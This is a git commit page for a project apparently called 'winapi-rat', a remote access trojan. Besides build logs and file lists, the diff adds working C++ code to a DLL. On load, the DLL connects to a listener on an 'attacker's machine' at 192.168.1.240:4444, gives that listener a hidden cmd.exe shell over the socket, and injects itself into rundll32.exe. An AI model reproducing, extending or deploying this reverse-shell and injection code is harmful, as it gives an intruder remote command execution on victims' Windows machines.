Improved some stuff, cleaned some stuff. Now after executing loader the dll creates a reverse shell to a specified server.

This commit is contained in:
hellisabove
2023-07-20 01:46:07 +03:00
parent 5a7024e1fa
commit eb9959e01e
53 changed files with 94 additions and 98 deletions
-13
View File
@@ -1,13 +0,0 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\dll.lib
c:\users\hellisabove\source\repos\rat\debug\dll.exp
c:\users\hellisabove\source\repos\rat\debug\dll.dll
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
+4 -5
View File
@@ -1,10 +1,9 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
fundll.cpp
tools.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
Generating code
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Finished generating code
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
-2
View File
@@ -1,2 +0,0 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+16 -16
View File
@@ -1,16 +1,16 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -1,2 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+42 -25
View File
@@ -1,42 +1,59 @@
#include <winsock2.h>
#include <stdio.h>
#include "tools.h"
BOOL was_dllmain_called = FALSE;
DWORD dll_param;
#pragma comment(lib, "ws2_32")
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
int reverse(void) {
WSADATA wsaData;
SOCKET wSock;
struct sockaddr_in sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
// listener ip, port on attacker's machine
char* ip = "192.168.1.240";
short port = 4444;
// init socket lib
WSAStartup(MAKEWORD(2, 2), &wsaData);
// create socket
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
sock.sin_addr.s_addr = inet_addr(ip);
// connect to remote host
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
// start cmd.exe with redirected streams
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
exit(0);
}
extern "C" __declspec(dllexport) void FunEntry() {
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
DWORD dll_param;
char dll_path[MAX_PATH];
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
char test[1024];
wsprintfA(test, "%s", dll_path);
MessageBoxA(0, test, "", 0);
// inject dll
reverse();
Tools::AutoInject(target_path, dll_path);
}
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
dll_param = (DWORD)Base;
was_dllmain_called = TRUE;
switch (Callback) {
case DLL_PROCESS_ATTACH:
break;
FunEntry();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" __declspec(dllexport) void MainBitch() {
if (was_dllmain_called) {
while (TRUE) {
char exe[MAX_PATH + 1];
GetModuleFileNameA(0, exe, sizeof(exe));
MessageBoxA(0, exe, "I am inside: ", 0);
}
} else {
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
}
}
-1
View File
@@ -1,5 +1,4 @@
#include <Windows.h>
#pragma once
namespace Tools {